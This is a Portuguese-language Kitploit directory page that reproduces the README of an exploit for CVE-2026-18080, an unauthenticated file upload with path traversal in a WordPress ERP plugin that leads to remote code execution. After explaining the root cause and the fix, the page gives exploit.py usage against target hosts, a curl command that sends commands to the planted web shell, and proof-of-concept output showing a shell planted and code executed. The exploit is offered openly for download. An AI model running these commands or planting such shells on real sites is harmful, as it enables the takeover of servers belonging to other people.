Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
By-Poloss..-..CVE-2026-18080 — Exploit para CVE-2026-18080, um upload arbitrário de arquivos sem autenticação que leva a RCE no ERP Complete HR, Accounting & CRM Suite. Inclui scripts em Python e PHP para exploração automatizada. | Kitploit
Ferramentas/GitHubGitHub/polosss/by-poloss..-..cve-2026-18080
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubpolosss/by-poloss..-..cve-2026-18080

By-Poloss..-..CVE-2026-18080

Exploit para CVE-2026-18080, um upload arbitrário de arquivos sem autenticação que leva a RCE no ERP Complete HR, Accounting & CRM Suite. Inclui scripts em Python e PHP para exploração automatizada.

Ver Repositório
há 19h 38mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-18080 — ERP Complete HR, Accounting & CRM Suite <= 1.17.7

Upload Arbitrário de Arquivo Não Autenticado via Anexo de E-mail do CRM Email Connect (Path Traversal → RCE)

CampoValor
CVEhttps://nvd.nist.gov/vuln/detail/CVE-2026-18080
Wordfencehttps://www.wordfence.com/threat-intel/vulnerabilities/id/b9d11eb9-5e18-459f-a9d4-cccb1d593402
Patchhttps://plugins.trac.wordpress.org/changeset/3656848/erp
CVSS9.8 (Crítico)
CWECWE-434 (Upload Irrestrito de Arquivo com Tipo Perigoso)
AfetadosVersões do plugin ERP <= 1.17.7 (corrigido na 1.17.8)

Descrição

A função save_attachments() do plugin ERP em GmailSync.php processa anexos de e-mail recebidos via IMAP sem normalização de caminho. Um atacante pode criar um e-mail com um nome de arquivo como ../../plugins/shell.php e um cabeçalho References forjado que corresponda ao padrão esperado pelo plugin. O job de sincronização IMAP baseado em cron grava o arquivo fora do diretório crm-attachments/ protegido por .htaccess em qualquer caminho gravável sob wp-content/.

Causa Raiz

Em GmailSync.php (v1.17.7):

root@kitploit:~
$name = $item['name'];              // Sem basename() ou normalização de caminho
$file = wp_check_filetype( $item['name'] );
// ...
$saved = $wp_filesystem->put_contents( $dir . $name, $item['data'] );

O nome de arquivo ../../plugins/shell.php concatenado com $dir (wp-content/uploads/crm-attachments/) resolve para wp-content/plugins/shell.php — um diretório onde a execução de PHP é permitida.

A correção (v1.17.8) adiciona sanitize_attachment_filename(), que remove componentes de diretório via basename(), rejeita separadores de caminho e bloqueia extensões perigosas.

Exploração

Método 1: Direto (wp-cli)

root@kitploit:~
python3 exploit.py -t https://wordpress.ddev.site

Método 2: Caminho personalizado e nome do shell

root@kitploit:~
python3 exploit.py -t https://target.com --shell evil.php --path themes

Método 3: Sonda phpinfo

root@kitploit:~
python3 exploit.py -t https://target.com --phpinfo

Após o upload bem-sucedido:

root@kitploit:~
curl -X POST -d 'cmd=id' 'https://target.com/wp-content/plugins/cve-2026-18080.php'

Prova de Conceito

root@kitploit:~
RESULT: [{"name":"../../plugins/cve-2026-18080.php","slug":"../../plugins/cve-2026-18080.php","path":".../crm-attachments/../../plugins/cve-2026-18080.php"}]
SUCCESS: wp-content/plugins/cve-2026-18080.php (57 bytes)
RCE: uid=1000(god) gid=1000(god)

Arquivos

ArquivoDescrição
exploit.pyScript de exploração em Python usando wp-cli
exploit.phpExploração PHP autônoma para wp eval-file
README.mdEste arquivo
Baixar ferramenta